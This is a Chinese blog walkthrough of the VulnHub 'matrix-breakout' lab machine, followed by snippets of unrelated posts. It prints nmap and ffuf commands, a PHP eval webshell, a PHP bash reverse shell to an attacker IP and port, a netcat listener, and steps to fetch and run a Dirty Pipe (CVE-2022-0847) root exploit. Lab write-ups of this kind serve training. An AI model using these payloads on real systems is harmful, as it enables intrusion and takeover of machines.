news 2026/8/28 8:01:59

VulnHub 系列:matrix-breakout

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
VulnHub 系列:matrix-breakout

一、靶机地址

参照引用文章的公众号,后台回复:靶机二,获取靶机地址。

二、靶机渗透,准备一台kali虚拟机,当攻击机。

1、打开靶场,显示登陆界面。

2、看到这个界面,不知道账号和密码,先外网打点。使用kali中的端口扫描工具:nmap 判断这个靶场地址的ip地址。

1),查看kali本机IP,确定扫描目标网段

ifconfig

举例:如果查到的 IP 是192.168.213.135,子网掩码为255.255.255.0(即/24),那么你的 Kali 所在网段就是192.168.213.0/24

2),使用 Nmap 扫描网段内所有存活主机

sudo nmap -sn 192.168.213.0/24

3)从结果中识别靶机 IP

Starting Nmap 7.93 ( https://nmap.org ) at 2026-07-30 20:46 EDT
Nmap scan report for 192.168.213.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.213.2
Host is up (0.00026s latency).
MAC Address: 00:50:56:FE:A3:35 (VMware)
Nmap scan report for 192.168.213.142 # 这很可能就是靶机

Host is up (0.16s latency).
MAC Address: 00:0C:29:DA:89:F1 (VMware)
Nmap scan report for 192.168.213.254
Host is up (0.00025s latency).
MAC Address: 00:50:56:EE:57:92 (VMware)
Nmap scan report for 192.168.213.137 # 这是你的 Kali IP

Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 18.26 seconds

3、发现存在80端口,通过ip去访问web界面

sudo nmap -p- --min-rate 10000 -T4 192.168.213.142

Starting Nmap 7.93 ( https://nmap.org ) at 2026-07-30 21:34 EDT
Warning: 192.168.24.142 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.24.142
Host is up (0.020s latency).
Not shown: 58696 closed tcp ports (reset), 6836 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
MAC Address: 00:0C:29:DA:89:F1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 34.58 seconds

4、查看一下端口详细信息

nmap -A -T4 -p- 192.168.24.142

Starting Nmap 7.93 ( https://nmap.org ) at 2026-07-30 21:36 EDT
Nmap scan report for 192.168.24.142
Host is up (0.00098s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_ 256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp open http nginx 1.18.0
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Meeting Place
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.91 seconds

5、没发现什么其他了。现在对它进行目录扫描,看看有没有什么特殊的东西。

ffuf -u http://192.168.24.142/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php,.html,.txt,.bak,.old,.env -t 80

以下文件琢磨下

robots.txt,graffiti.txt,graffiti.php

6、可以输入,尝试尝试。发现了这个,我们去看看txt文件。发现我的输入都被保存在txt文件中了。

7、抓个包,看是否可以传马子

8、有希望。有内容,有地址。准备反弹shell

<?php eval(@$_REQUESTS['password']);?>

9、放包,去访问1.php文件。

10、发现白屏,八成是上传成功了。我们用webshell连接工具去看看

11、成功getshell。

我们现在继续利用这个漏洞去反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.211.130/6666 0>&1'"); ?>

注意 需要url编码,然后上传。

12、成功后,注意开启kali的监听。

nc -lvvp 6666

13、访问2.php文件,成功反弹shell。

14、进行suid提权,但是没有什么文件可以利用

find / -perm -u=s -type f 2>/dev/null

想想别的办法。先看看它的系统版本吧。

uname -a

系统是Linux4.x|5.x看看有没有漏洞能利用,查查资料,直接发现有漏洞能直接用CVE -2022-0847。

在kali上下载

git clone https://github.com/imfiver/CVE-2022-0847.git

自动下载到这个位置

进入CVE-2022-0847 文件夹

cd CVE-2022-0847

在 Kali 上启动 HTTP 服务(指向脚本所在目录)

python3 -m http.server 9090

在靶机上下载脚本

wget http://192.168.24.137:9090/Dirty-Pipe.sh -O /tmp/Dirty-Pipe.sh

在靶机上赋权并执行

chmod +x /tmp/Dirty-Pipe.sh
bash /tmp/Dirty-Pipe.sh

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/8/28 7:58:43

Windows系统下TeX Live 2021与TeXstudio安装配置全攻略

1. 项目概述&#xff1a;为什么在Windows上搞定LaTeX 2021是美赛的“基建”&#xff1f; 如果你正准备参加美赛&#xff08;MCM/ICM&#xff09;&#xff0c;并且电脑是Windows系统&#xff0c;那么这篇内容就是为你准备的。我见过太多队伍&#xff0c;在比赛前48小时还在和Wor…

作者头像 李华
网站建设 2026/8/28 7:58:25

python基础语法学习: 迭代器

文章目录 迭代器获取迭代器的方案iter()__iter__() 从迭代器中拿到数据的方案next()__next__() 模拟for循环的工作原理迭代器的特性 迭代器 首先请看以下代码: for c in hello:print(c)要使用for c in 这种形式进行遍历, 对象一定要是可迭代的东西(iterable), 例如: str, li…

作者头像 李华
网站建设 2026/8/28 7:57:25

导师严选!盘点2026年风靡全网的一键生成论文工具

一天写完毕业论文在2026年已不再是天方夜谭。2026年最炸裂的一键生成论文工具&#xff0c;实测提速效果惊人&#xff0c;覆盖选题构思、文献综述、数据整理、格式排版等全流程场景&#xff0c;真正帮你高效搞定论文写作。 一、全流程王者&#xff1a;一站式搞定论文全链路&…

作者头像 李华
网站建设 2026/8/28 7:55:17

WebGPU玻璃材质实战:双Pass离屏渲染与WGSL着色器实现透明折射效果

透明物体是 3D 渲染里最容易“翻车”的效果之一。尤其是在 Web 端做可视化大屏、3D 编辑器或产品展示时&#xff0c;玻璃、水晶、水面这类材质&#xff0c;用传统 WebGL 实现&#xff0c;要么靠透明度混合硬撑&#xff0c;要么写一堆后处理扩展&#xff0c;效果还未必可控。很多…

作者头像 李华
网站建设 2026/8/28 7:54:51

数据结构精讲:单链表的操作

一.链表基础&#xff08;单链表&#xff09;1. 物理结构与逻辑结构逻辑结构&#xff1a;线性结构&#xff0c;元素一个接一个排列。物理结构&#xff1a;非连续、非顺序存储。各节点独立分布在内存&#xff08;堆&#xff09;中。比喻&#xff1a;火车车厢。每节车厢独立&#…

作者头像 李华